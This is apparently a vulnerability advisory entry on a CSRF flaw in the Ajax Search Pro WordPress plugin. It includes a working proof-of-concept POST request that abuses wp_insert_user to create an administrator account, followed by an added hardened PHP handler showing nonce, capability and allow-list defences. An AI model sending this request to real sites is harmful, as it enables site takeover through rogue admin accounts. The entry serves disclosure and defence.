Ajax Search Pro < 4.0 - Cross-Site Request Forgery (CSRF) Add User
Description
The ajax-search-pro WordPress plugin, in versions before 4.0, was affected by a Cross-Site Request Forgery (CSRF) vulnerability through which an attacker can add a user (including an administrator) to the site.
Proof of Concept
This will register an administrator with username "xADMIN" and password "xPASS":

POST request to:
/wp-admin/admin-ajax.php?page=ajax-search-pro/backend/settings.php&action=wpdreams-ajaxinput

With POST data:
wpdreams_callback=wp_insert_user&user_login=xADMIN&user_pass=xPASS&role=administrator
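As an added defensive illustration (not the plugin's own code, which the page does not show), the following is a hardened admin-ajax handler for the same wpdreams-ajaxinput action: it requires a valid nonce, checks the caller's capability, and dispatches only to an allow-list of callbacks rather than to whatever function name arrives in wpdreams_callback. The handler, helper and option names are assumptions.

```php
<?php
// Added example, not the plugin's own code. Hardened handler for the
// 'wpdreams-ajaxinput' admin-ajax action. wpdreams_ajaxinput_handler,
// wpdreams_save_option and the option name are assumed names.

add_action( 'wp_ajax_wpdreams-ajaxinput', 'wpdreams_ajaxinput_handler' );
// Deliberately no 'wp_ajax_nopriv_' hook: anonymous requests never reach this.

function wpdreams_ajaxinput_handler() {
    // 1. CSRF defence: a nonce bound to this action must be present and
    //    valid. check_ajax_referer() terminates the request on failure.
    check_ajax_referer( 'wpdreams_ajaxinput', '_wpnonce' );

    // 2. Authorisation, independent of the nonce: a settings-page action
    //    must only run for a caller who may manage options.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    // 3. Dispatch through an explicit allow-list. A request naming an
    //    arbitrary core function such as wp_insert_user is rejected here.
    $allowed = array(
        'save_option' => 'wpdreams_save_option', // assumed plugin function
    );
    $callback = isset( $_POST['wpdreams_callback'] )
        ? sanitize_key( wp_unslash( $_POST['wpdreams_callback'] ) )
        : '';
    if ( ! isset( $allowed[ $callback ] ) ) {
        wp_send_json_error( 'unknown callback', 400 );
    }

    wp_send_json_success( call_user_func( $allowed[ $callback ], $_POST ) );
}

// The single permitted callback: sanitise the value and store one option.
function wpdreams_save_option( $post ) {
    $value = isset( $post['value'] )
        ? sanitize_text_field( wp_unslash( $post['value'] ) )
        : '';
    update_option( 'wpdreams_example_setting', $value ); // assumed option name
    return array( 'saved' => $value );
}

// The settings page must emit the matching nonce for its own JavaScript
// to send back, e.g. as a hidden form field.
function wpdreams_settings_nonce_field() {
    wp_nonce_field( 'wpdreams_ajaxinput', '_wpnonce' );
}
```

A forged cross-site POST cannot carry a valid nonce, so the request is stopped at step 1 before any callback is looked up.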
Classification
Type
CSRF
Miscellaneous
Submitter
A. Samman
Verified
No
Timeline
Publicly Published
2015-03-18
Added
2015-03-21
Last Updated
2019-10-21